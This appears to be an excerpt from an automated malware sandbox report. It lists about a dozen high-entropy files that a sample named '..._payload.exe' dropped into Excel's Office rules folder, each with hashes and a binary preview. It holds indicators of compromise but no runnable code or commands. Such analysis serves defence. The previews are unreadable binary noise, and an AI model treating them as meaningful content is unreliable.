                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):923
                                                                                                                          Entropy (8bit):7.771183854990291
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:+bIBpM7JiXGA5inmDSJJ3XOnASIU0OjN/LMbD:+MMFiXGxnmDoXOnAJUjjFLGD
                                                                                                                          MD5:191103F52ECFA3570DBC07B8F6B72262
                                                                                                                          SHA1:9BDB26EFF76F5E5CD379932932D4F503B9B7F554
                                                                                                                          SHA-256:C7C06FB5969D28004E2410A5ACB571D4AD09211D1B61DED3F6D9AE24173E7B2D
                                                                                                                          SHA-512:22C4AB1A149CEB58EDE6259606836DF4A624F3D2DB9BFB32EE2BA9C8CADD001A6332F09D93B94378E4FFB45A6000BB8694DE5CF56CF231B944173E0EDAFC9244
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml6..aLE.<E..Ns..T.........b...~..#.:\.....9..j.ns.' ..o...F..,.V...>....E(...!..s..{z.#.y.!a......'Z......7....]...M..@....g2."@../u.-.%*..3..vG.Pp...v...I..9.,..>..]'S..e...p....K.Qt,....{....N.h...^.......;.D.........1I..@...i..nI...{....#%.'*[k..k@.L.#....!...0....?Ri"W..U0...e.AC.i..{[.....v..e.)".'.=..f..m--.H..k\o'.[..lHo..d.D...$qz.>....z...~..Ub....j.&>o......N{j2J..)Df..u&Y...x.....R.g...)..EfX...{.X...v#Po ..W...#5.U7`..bN..g.Xlv..X.......#.y.....^8...."7A.S...O#..EOB.Ui..7b.....5F...|k.[..i\..5.TOg..`.......3....>.g#...I.Z_.z ...a&..W..OAq.5.1...J...f....R...'f.....?.H\..$n...$...F..I..[....@.....O.....S6....<.....}L.....X..+...w.qc.,.&U.*3.....!.......F......mE....fC.s..2..'..4..=..i.A?.pn.u.09Ck^.x.E.0.Y...7./.3.d..X..q#W....r/<L......d..o.:.k..P...C|..R..2.2[_.q.&z<N...o.[QtphJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320035v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1413
                                                                                                                          Entropy (8bit):7.8600083709818085
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:mkh2uXYmzTlyDWThqwixY79aRIKTvbCKAfSQc2V07Hiwb+bD:pE5mzfTpiyZwuNfSQJi7Cwb8D
                                                                                                                          MD5:544D82407A3CDEE45CF22D6747E77393
                                                                                                                          SHA1:3350EAE1CDBF4959A1545B476201893672813B5B
                                                                                                                          SHA-256:E4E686C91BBBF290B8B10512BFDBDA723F77028D10DAD6D58799BB1468F24089
                                                                                                                          SHA-512:F17573DBA1C19EFA84BA74E92369FCC65198A3C79E639F1677C47E0EC4CF7FF9F7FA70CE4B0FE6411A67A8F3C36614760BE7A8E6B0B590435A5612C38D40B61C
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.}....wz......H...=.cl.....>...nt.q.9.d.c7..x.p^m...2p..@..l.....1...DP.?..i:..(........zeop]=..=..gH...+x..............u.`...Ljs...oA..e....:...Se..Y..ah........c5....G!U.j.4.}=..g...W...}.X..NV.@....`....q.0.-?6....E.Z;.{.I7.%...m.d.&Hr..c.......0 ..t.?...p;.8v4.....+.O...i...B..3(..D...L2.........8o.).o.n.Z..v"_.....4.b.N..9lkh}(O..%..f..G...9.@p%.Oq.....]......q.4lV..@"...F..._3!.M.=)...~..<....!...TZ....'....?$.n+..c..P...(.`...-...."........a....f.......7...-E...Y'..z.L_..t.....vU.R.X......WdTJ.n.ja..<..3...t.Bl(..H...]m..............u..3.ejc..J.E2.r4}..%./.)..S.&.H.]...i..........".b.B..-..1......<V....\QV.Cbj.L..G.}.N%./.q...9&f.?K..H.....G.......h....vX....h...jduWhO>`K=..h.M..h._y.I..._\....Z,....5..y.t..r/.P...[..X7..R;9g...[.Xd..5..~.........4....2N6.t.|.}.}......GL..Am2..X.....w.-....3...o.]..H..%...=...J.Tt....{.....y@....>.v..-`!...X6A..L.6..."...6..!.f..z0...v.E.6.8.|s..4D....TZ....K..u.^j.......l.....q........!.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule322001v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1000
                                                                                                                          Entropy (8bit):7.772706917361653
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:Djv8eU/TXhzPxjTToPKEt9ybQAie6CPoyXPcMbD:EtxzPxjP3Q+/lD
                                                                                                                          MD5:AE66377F06B602EB4C540FE7EB767486
                                                                                                                          SHA1:D698C6B69F8CF1ADC2FDCFF1BCB0D39EA887775C
                                                                                                                          SHA-256:06E65409F14ECFE30CC9102E062DA334A5341237D31043C5F48E3CDF87F8B854
                                                                                                                          SHA-512:138056144ACDE60858628BDEA53D2A1C824CEE7F874E777FD4DAD8A3CD58491FBD8B560636AF3323758F902A55A896949552F9065C0ACBFDABFA17867BAB809A
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..5...}.H...TK...}X@..)6...)i.........e..%#..t%.B+..y'G[:P .....r..^..M...._.z..;i..$....e.:....DU....O1..h.7..L... H.Z...DQ...@....a....$L..\.qot.|...q-..Lc.D<....q..9..7>.f.:....Mc9..7..Vh...O..x6......./L.1...2.aq...<2.......y..P.Q..&M.M..R...[!K.]...88;C1L.A.L..<{j..pM.......U.S..{ZrT...C..Z*.~...?.X...-d3..M..+.J.o0G..f|....1:l~q....rIw.Nn..R.....~.M%M...BK....'..]2.r.....%>....N;.$^.....a%Y]._.....8..,..`L.T.L..[Z.^.Rp........_)....7.z.r3.[...N(2..^.}.-)...%D.'..*..D..Z.qe.G..22.vp2...C6.b.D.YYf.T0~.b.Ob"w.y.....J..,.,..A3]/..... .3...?..m.U.!+..HK.?.my3...0...E..hY.z..s.p..W.U.J^..4(....{. .Y..D..W..V.T...l.[uwZ....zfVp.2~...:......h"...Nj.[{.....-T.N].rSd...R.oB7..S.hkvAm....@h.Gl.ex.]*.u...}...f....R..p......e..+j.9.84.."".e.X..n.N..J.....:.....|.B..p.l;..O..yp.|...'...T%.~Q...d.z?a..}.T..^..2..~..z.....3.@.A..\.B.^.i.._.d.i.I;.!.Z.=.Q.3...I.phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule322004v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1133
                                                                                                                          Entropy (8bit):7.795188519962153
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:WYcqZc/ssv8lq9jQ5F7on7zIS8sRBQVcvGQATLDfcWGkiG2NTSMTehi1bD:3ch/Cq9uJonR9uVE1APDETI2qQD
                                                                                                                          MD5:5B57A643C7ACAA19C910D1170D1D2C83
                                                                                                                          SHA1:7A97DACD55590DFC769E28C3874B8A7BAF845B0D
                                                                                                                          SHA-256:57177E0E86BF79D4E05A62B125F22CECD837A291B38A330DDB2065A21F95A7C6
                                                                                                                          SHA-512:9FD047D9AA884DAC9F10B9B5BE8A7E04089E482FCA24CC90082884066D0B1291C78ABF8713F416D62886620BD03CC0F795993A77389A70CD1ACD15C4DF8E17F3
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml...3{......../.+...,.T...t.u.I.....S0.!.l.K.>.cv..F7 R..=..w..H...H.i..S)...a.g..".)..p.^I...|q.......T....u.JB."..]....O..2.WMk.4y.g.....@T..n.T.Sy.......$).....d.`..<.n.Bi$.A.....C.3..LI.z.)...i..h.....6..m....T.v.7.Cj3W..).h..Nq.....8..Iv.....4._..Sz. .g"^..7.9...1.U.J....}/.....%._..s<.l..{.q....3r......l.........<..bFJ..i].E...~4zB....{.{."`.$.<.r...r..].9..J.c&..A.Q...hd..[+..v...O..q_.Az...p...F..Z.Fl...fCy.Cn5......9/2..4d.-8>t..6..Mo..}[......f_..f.].iZ\..<..<..#c.!..a.._.>..y......s.P.o..........k.'......>.V...q.kSzk...~..}nZ...."mW....~z1.%......ve`....-......H.F..D.X.....0..d.=.!.....w.i.CV._`).."....g..0u..v......#.]..._....T....).;...*......Y..c.....M.ZoK<...........Q<."....|F.)...xb.n...t.....X..Jb./d..Y...2{.B..*...d.A--,...N...z?P..m.OC...d<.>z...R..:.L..1M4.C.Uh!t5...Vs...Gu.6...57*.A..\.Q.N,..1I.=..:I;I............F.`D..Q.....5.a_.]c.l.....$/.F..k..")Qph....Z.S.Nl<0.#V..p.d..Z)..1..z.....]...N....df..M...x@...^..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule322006v5.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1692
                                                                                                                          Entropy (8bit):7.887492204533752
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:cWrnf3+OvakSh4elm/bmjfke+JDcjz2DD:1rnP+IdSh4elKmTX+JYj6P
                                                                                                                          MD5:CA034AA3F57BEE7C7E5171701F319DD7
                                                                                                                          SHA1:9C04213E5348223F7D949BDEA7B5EEF3DC346593
                                                                                                                          SHA-256:82DA234AB3257AC65664E5D5EB24F20976A951970DD5DA61992CCE277E670C3C
                                                                                                                          SHA-512:604A80E3D893E70677C4C4CAF046265347C2FBEA6EE561641137A294E3A6012071313029C8FE0E0568D719AC159B7A95FE37BE50252F536F7234EA73AB7E971C
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.$..8.......ul.E7e^la..H..h...y.y.a.Z.U$)..N.J......M[1....[....t...]...%.T........8..Su. ....{.X.0V.{.V..../f.....?....P....8p-M.-..5....h#gp.Q..|%!jl....8....b........g..(p....w.e..,..^B.Lb...*.-....\[3.CS...5CS......6QO..u....-.|.o...b....Y{..{U.Io..|.....pVMg..@.\.]......o..f1.S.. ...@.=T..}:=..F....p.....J!)...D&....W.6K.:...K.6z..0...V..7.[<..c...6. ".&.....=.].>j.,.4Im.GH4.pz%....E.<.9.R:....:$..d.v.9...nPF....~!x.......p+^L.Z.[..i......L..{x.t$..f..E#}.....g.i"v....9]p...6Sz.Da...1.Z!...8k/!.s.p.x.R....G_.....,vE..4....8z>W....}Ht........qtm..y.X.8yN....+M..X....0..H.5..S@.....}..JA..e.B.mG.UNH^S.QH.1.DZ.'.~..g...h.l....".%@.~..]q..{+.}c..@Y...r.E}.........ZHw..*$.:2....~S?\lR.s\....JN V.F.5....&.+\..b...G...}-...'..Hza.UL7.A...K^$.q...uRx:FPi..N......<....b....F.NA..r*46O.,|s.....*.-.].bkOE.P.....W.O....n.U..6.r.O........$Ld.k5...6........X...+.[6)..K....4j.v.%..{.c*.K..#......7.^.U..=./....L....U...S.n...91..g.^'.z...

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324001v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):846
                                                                                                                          Entropy (8bit):7.7273247312321125
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:1eC4+KARRE+Oamoh0cMuzkOgCTDoebOYbD:4C4+lE9o+w3LD
                                                                                                                          MD5:90BD319427392F628BB8C256CF2079DE
                                                                                                                          SHA1:1852E43A67B5B9F5747070ADB3E0B7B1B56DCC1D
                                                                                                                          SHA-256:25686F9FF3886EC2C6B94FC210DC91FE8B529774E5C41702F84A074288A9875C
                                                                                                                          SHA-512:CC579AF4F42394D9635CEBA404E9F46BF669DBA47E0AE38294FB032109EEC439A6861E309F454B36377B932097C2A662887D6B0AE287754C5D4E907D0C73C7B4
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmla.4|.....>..:.NX.ov..8.*.. J.b...a.2.-.~v.,..f.. ..qN......./.yPv..H.Z......~..7.z....).y.].ph.ul.(M.C0...pk].....-..o-...+.\.;.N&.(y..e...B..q`.P..UH...U..pf[....E?0S2....k.ev.)......n...S.T.a?.).*.....JRZ.S>t.VXnK>........T.c..C..W...u}.#T..={.^.-z.&..}a++.e..........Yg......"X.=..km<?7id...j.v....9B.`.U.q.]..e.o.$......9...`.....X6..V..{.6..i,..6.+...S?..N...:xu...n:.f.\....X..........I.T.?.....qV.$..yZ.L....d?....|..6Yb1.5>..}.....`.D..q.[X.....KD...9.n...%. ....<2s>B...c.....z............j^....8~_.9.cl...NP5eIk..\.B!P.........b:.w...*#...U$....A.b.073.....L..Di..r.7p..$..l{.Y7.i.5\....f9Kikh.l2.).....}..Xz....D.n.X.~-"3...-....e.IZ......{./..1..fj1.j%...>c..1u.n.Y....U<.[......RPP..9....".=......(0.7S...Q.phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324002v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1197
                                                                                                                          Entropy (8bit):7.838369194559107
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:buwvCek2oCrxD5KqJ7sMsZnk4IA13VDFWEMxrqfUMIPi/2nv0CkQLgzbD:jvCek2osbKqJ7snRYnqsMIP/gnD
                                                                                                                          MD5:FF8D02D11BEB0D0A05C8B8D05C02E153
                                                                                                                          SHA1:EC4004D392F89488FE58011109E43707EF831E8A
                                                                                                                          SHA-256:6EDE418172A354818E5FAAF1E03F50F53CE6A94823DA56008CA2F30F1800EF67
                                                                                                                          SHA-512:A22944E5104D334F0E1BED39BB7ADB7B1CC22B0E182BB9D11853F48218318636EB47A9A82C82CD243B86700F0E189C6747CF4831716CD9920C6057724BE0E165
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.Z......jp.......y..Y.).$%H.....;H...!...'.P.||)....=h,[..T..........<...i... ....N....)ug.K......S7...q..dO.1,...C.u.CA.z.8.n.^...x.0.%,dVlD.iMz.]9....$.^Un..QTFe.`o.y.L.....1..Gv.V...'%.3r1/.@.0..@S.SO.............cdn.q...ML(...a%..%.:..!Nc ,(.."............ ..#&..%..w9...I.n.N.i(.....'._...G,Qn....m".F.a..CcM.='.vq.=w_.k...........Gn.|.&M.....Q4..2.(.4..H.A0_...A4...}J.E....=.{.Umo.{z(.. .P.3...A.%.&}..W...o.....'.l. ..i.S..[...eGq.Z.]SE.*}!..o/.sx....e.....#]....7..h.f12X#..f_..8.wQ.8....w.{.'....9...(Xc[..e..@......Z?.RR.R.Nr.....t.,2...Fs7..}.fT.e3........I.......0..(T83..e*O....>.".dS...2.1.~......fs.4..\w...H..] .......?.C..]@..n../.1.->..X..?...|..._..... .!].......\.._...!...c...O4...nPM`...V.1.3.V...-\k....%.1...Y...6..9.....Q<..YP.......HK}.pg."..S]...:.w./......x.j.g....2u.o...7.h|.a-.#.......v.......C.."...%.U0..=k.....>......$^.E..e..(.4......Z.v.M.....5.G.s..D!rD..s..q...|.Sj....%........._....#.{.eI..../Kf..s.<q2...>..O.$

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324002v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1197
                                                                                                                          Entropy (8bit):7.815448242198944
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:vACdWAR9tyyzKMB2a3djWQVI9U6hr2u+zADID95NKyEk8M/bD:boA5N3da9hx+zAUD9+7WjD
                                                                                                                          MD5:E87E4B5AEB333E72C799239A7E92AB2F
                                                                                                                          SHA1:B37955822A75F852BBA9118C2A679122432DAC0A
                                                                                                                          SHA-256:DF5B72FF7D4E61BABE7DE34B618D43F4ED43A5EE7070B70EA9225747C7AA9667
                                                                                                                          SHA-512:69828941641436CEF870D95F0C552DD60FBE7C608C0165B7161D0DFA5F586C998C8208431B0F64E6C882A0ED9194983E658E7F06412B65191BA32076C7A83114
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.j..D.h~...z,....yPU.}..+..=..9.8M.Q.X.e..{...=1..i......+lV.M5+.....K..(.....e.5..Q. 0.:........qA.V.....E..0\.J..o;....5w.y..8`.......yy.P. ]...Y.1.v...O.,a.{..V.....W2?...._6^...DlH....9@Nj>...Z......V.#s...6H..5L...}._1..+.......<..!$........9o..mY.+..|#..v..u..../..G.e.~*TN.e0.>..b5..f...4.n".7.l.TL......k1ca\s....3......*X9.>.....Cw{YK1....B........gM.t.....&...y...T'.V...N...1.H%.&.d.F#..`.......\.#W..`qfL.R..c.2.....s.".l.F..m+D......%N..}.L '1....W........q]...x.".B.(.....ToMr..4-~...P..S.bB......4.......}4.N..#.).....j...1P.......6...Vx)...........{A..c./.).D.)...nZ.L5=U....Rj>.B...G..P1.b?..#.r....OU5.....eo=.".c...F.h..R.....g)@...%.+.a.-.J.2.#sZ..bS........oq.XFl..4.>H.]'...p.#.....q.....af.Mg.U.l.}S..+#..F......4...En......`;..WAl...1kB.........g....._...*..$uz.v...d.w..T.}..).".n.0J....f.P..jBO..A......*..h....(....Dg..)jb..g[uD...+....'!=&...@.G......iF.RA.....Gd.F.FV;s$S......h.Z.':;e_c..&.Wx#.Z....3..)..L....rf4.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324002v2.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1197
                                                                                                                          Entropy (8bit):7.8215777501107135
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:iWQiRK4rkq/joKPhXM7oRZusjgPS4zpUBGlUaq6Ea3vfCJMbD:xDQMoKOoRZusgBpsIZq6NCUD
                                                                                                                          MD5:C70EA7C09454200C1F5F85AF5E38AB72
                                                                                                                          SHA1:20151FB285165A23EEDFDBEACDFD9ACA5B788EBB
                                                                                                                          SHA-256:39B6654C21BF50B785FF8C2C658AEA02B9877325501121984119A8696C6F59F7
                                                                                                                          SHA-512:5DEF78C4FB1EB6B3D246F537C1271DB4255E33964F535E3DE18F3DE378883C16C6C697E43DB5A935A18B06EE97E5C424FA609EEFD9E59D4AF18A2C6F506B5AF4
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.[....6..7..1.1..B....a.....n...h..o.p@..Il..D.>..%9..{..Oy.'......|.Z8-w....L.......>.==)../{36..u.a..`..o.....?../......|..._.^../fE..1@7....n.Mr.m...l...gu]P./..)Y%...m...v....7..=p.&N.?..#.Z..m4...~+..o_.......&/...gP..F.7.AZ/.s.v..@......?..m....I..v...i.(6...=.n..-v...9...f?..0..>.I|.7.RSe.{....u...K.,#?O.J........GB..=.....P{..v.k..`.;w..K...?...,G.."..u..XU.R..!.......*.$..n.{D|. H(.....B.}.....k{....h`,.Q..!.[.z.VA.Vm:.<.....'U.f.Q..9.L.\.F..)..j.Q..|....a.c...c..."3...@....+!g.......A.e.$z.l7..0\..b..M.b..6w>K.........t.1...1h.....*.8"SL..5.j....d..`..+2&*.Z.d..0`pI...k..p...../.g.E..0....a.6..0F.....`'\...a....A1..=....0\....{....Mv.c<...0fj.W...........|l.|F..?.g .my.a.,7...,n.....R.'....f]...RTa|.....Jf @...i.....=.{.7..eWNO1.M..R;.Z.r0I. .0..#.xu}-..4.V.-.L...qq-.k%....1N.....b.o=........a..... .4nyT....-l.g.%....'......U....a.SW..F.8.,Qy.......U.....-.\.;0.........p...hw|a.K.-....Zd..1p.<7...~......-

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324003v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1079
                                                                                                                          Entropy (8bit):7.7885590804781915
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:IB398bpl7rHAVtQZOtivvyvgrhzmPGMUyWKUKku7ZbD:SOlU4Oo3proPprWKUKkuFD
                                                                                                                          MD5:64DB90EFDC4D7F072CFC002BBEEB93BF
                                                                                                                          SHA1:84201143940BF5078605B0BFF5A3F143CA3DC7FC
                                                                                                                          SHA-256:0DE0658FC4E51E98C622B0213E67E9398A25A26BAE0CE18CD5BB58A1B07140E2
                                                                                                                          SHA-512:F2441EC3ABC49F45ED0C8737EBADCF390C68CE2BF3379217FC30BB218474CD26CA7A25AACE1374A197C6924E3CCCF8BD30D35D9E04A3FB13717B89FD473C75C8
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml5...Ji.f....kF...q4PY.-*]... J*.p.m.,... ..z.f.....BC....\....1m...m2f..K..9.:..I.|....._.3..0.i"7..y`..B.......%csn.....u1.pb......4............o..X...\~k.d...I.B!.0.]......]3M.(..!.s.Q....T\....$...x...U8].....Z.q........,..t.|.s.....mJ...G.4.a.;.]Ox..n.q....e....^.Y..Oh1{W.c............%+.@...H"....=.....96......$.....j.ge......*Z.B.Q..........u....]3<...Xi...7.G.ym.u.J..:..So.K.0m.Iw..V....w.....y..![{%....ZD..x......^....J...wl.......mv...Lk....G).~+UA..]i...`i......hP.Le.5t..".F.w..gjx9...\....h..aD....np.5.).]. X....oH.'.{d.D..j...e.......i...!1.J.r.].........i....7+.z...<i...[X....:.......Rut.*..>.O.).4~..../x}/.bd.......P..=......^..q*(&k..M.YM.z.Je]..C....-]..(smZ..R4..3ao....).a....$..k7.g.i.Z,..Bx.,...Z.H.....&^.aP.F.v....,....K.`4y...x..I.....N.u..j..g.%... Q. ....f....2=4d>fC9y.~.....).,..~.{....).eo...,....q.......l.h......Fsd.a...!..".G.....ML`yC-....s...O...I\f#"......4..0.]..Y^...^T.=Z....~~,..|OZr.DT.K.../...ST...

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324003v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1079
                                                                                                                          Entropy (8bit):7.786455846454737
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:SpXPXD1Sytb0yggW678755CO8Z4QT1dt7Lhb8GbD:SNPXEyCygO8t5pQ4QhdhL18UD
                                                                                                                          MD5:68C067839DCC9ED3B9FABA3D117BD8DE
                                                                                                                          SHA1:672F8A218036433723955B8D339158B3307E54F9
                                                                                                                          SHA-256:DBB90C8A19F793B4DEE8CD2A2FADDF9FEC9CFED352647526DAB2821856588C31
                                                                                                                          SHA-512:112438388882ED7C12BD7DF9EBC3CED13D0A0303F5C4DBCDA6CC0D2786E165AB0B0598E148443ABF403616BE25AA7038E1E878C955A7E0159F99FB1CD66B49C9
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.`...".bQ....Ro7...x ...7l.kf.03..A..z^.w.....6p..G4%.N0....v.l.R.$..c..u.-.,..ZE....a..I.qC !L..:.....&..B*r.k..4)...... .w.L.n..}...U.*`a......{.8..-....v.8!..6..Z.G&...~(...._.c....f...../...J..t.T.M)..e+..]Z....c...1@4.0..+..zt..1....!.#..ZM.l.3...*E:.o..A...9.*..4...sb.5...mM.O...-VB.p.-Y.D.J.YJ....Shg..m.)....C..xGA..$!.xF.l..V/..........w(#'|e..iG..QD<...R....U2... ...2._..Bg....i..].&.4V-K.R.....a..xd......Bu..[...T.L.:*.U...C9.0a.6K.f#=..>.[.v.!T..m.$.+.J.0.......`...AH.u.#g.....PdZA..r..)...E0`..>>....f....Pm....).Bee.lo..r+...y...w.._.3.hP.kU.....|..7.ml.7....WY....*.Nj...vk.0~b..6.....z!.....Bw..r.5\....b..1C..K.........V.6>A.|..n]..w...@.._V&...*..$t..G...c..d.SG..v...[Hu..+GV....B_Z..s!N.Opda..%.d?.G.'.{......6.K.+.R.4.3....HJ..0....`.e.P.Lz...W.X...mg.71`..Ee..68....+.F..#TE...d1....=.._.X..m.}..,e).V..@..^<.wc.c........0....ys4...r.(b.:}..N.A.Y.u.^....1'...DUs.......9$.C.0>.e.-2...D..Um..A{..f..F7>.|.Q:../....~..?.^..&.X

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324003v2.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1079
                                                                                                                          Entropy (8bit):7.79279031347058
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:xcs8nRtfTSYJc+q4HrAT+a21lUSSR+gVmBCSMbD:0nRFTBJc+q4LAyaEaZmBQD
                                                                                                                          MD5:5CD4471DF97F15DB5B98014EB9F2D8CE
                                                                                                                          SHA1:22048113B382AD756ED156B2CCD95F0DC52398E4
                                                                                                                          SHA-256:8914E12942FF6421DCC2A40C3ADEEDB44A82B675023B8AFF51A2B12E4AF671B1
                                                                                                                          SHA-512:93EEA370C6E0EC6B3B4EF9D80857D44F18C2A92D30FEBF8BAB20E0EC59679005474CA5DE54FC32A38D9AD4EA54AC24832214AC0E08CF703DE13A569108CED6E2
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..dF[..|....K..&O..;..}..s....v...n..#.].q.....v....E.(.t....Q1Cz.+.Y.I...?.......%.F.Xu...%.P.}.d.U.i..^..(-d..\..MV.A..\....M............v.x....eA7.W(.tod.:...u*[f...Xm.5%_..{.G...^...K.k.d~.3..n..!>a......|"B.37.....1.>..n..#.&sX/rw.W.....l._...]K...."..>.i....4$K.6\_.x....x..C..CK.......L.0..E8.....YR....m..5.A..C..FRO.V&B......?X...0!...,....I......B..C..u.2....Z.wE[...0E=.y.P.p..w.x..i...(H.!+.8..(%.__@..5,0.W....I:....e.Y..Z......{.=ETN^w....J.U...i.8...?...i.:..u(...'.....9...Q..ZgE.c.U*(...1.G..".........B50......B.C...&............Dl....,.[...=...k..Hj..~.f..J|(g[...+.wk.p.k...gRF..aMz.I?.b..\.hrg.a...6.s 4...<.Ezw3{.af.O.*..D$..#V...g.........E.u.!.?...Y..]p.s.JM.k.Z.,..R.=..c..*...IJT.....\...j.@..t..i..<#...$O..F.e...t....2.$...M......;.F..1.d..l..Nl.hj,.....T...w.M.....u.*Q...Y.`...R1..uK..*U#..Q..."..>Hg..i..x..8. Y.)._cl....y.-..-.f.Z.@)8..~m.v.."....d...0..[.g4.......]9}......G.v;Y.....&-.....o.fq.....m.a.zt.U.Y..U+(H1

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324004v3.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1073
                                                                                                                          Entropy (8bit):7.779843419409371
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:s/jRvKKruJcrmThvhsCGV1DBA/jyDi9fAuVBTonBkYH2z3YBxLvI+ObXFVMyYIbD:UjR5ICmFvyCkfemWVAudDELvKXFVMyY6
                                                                                                                          MD5:46575CE4650CF232FF7B9658188FDF32
                                                                                                                          SHA1:C24C916AC852B77FBDB428D353390678D27270D4
                                                                                                                          SHA-256:B9FDC80535B11D73E038E3B68C409B683D22B4A7F3B00FB3D877D6F769EE4760
                                                                                                                          SHA-512:DB7AFFF60872C1FD532CDADF3A21186CD44F120B05F00167AAC89BB31D8DB3CA55A4A16247193F37C7580A020C5E4679772DA236E84FBD36D568B5A11275CE58
                                                                                                                          Malicious:false
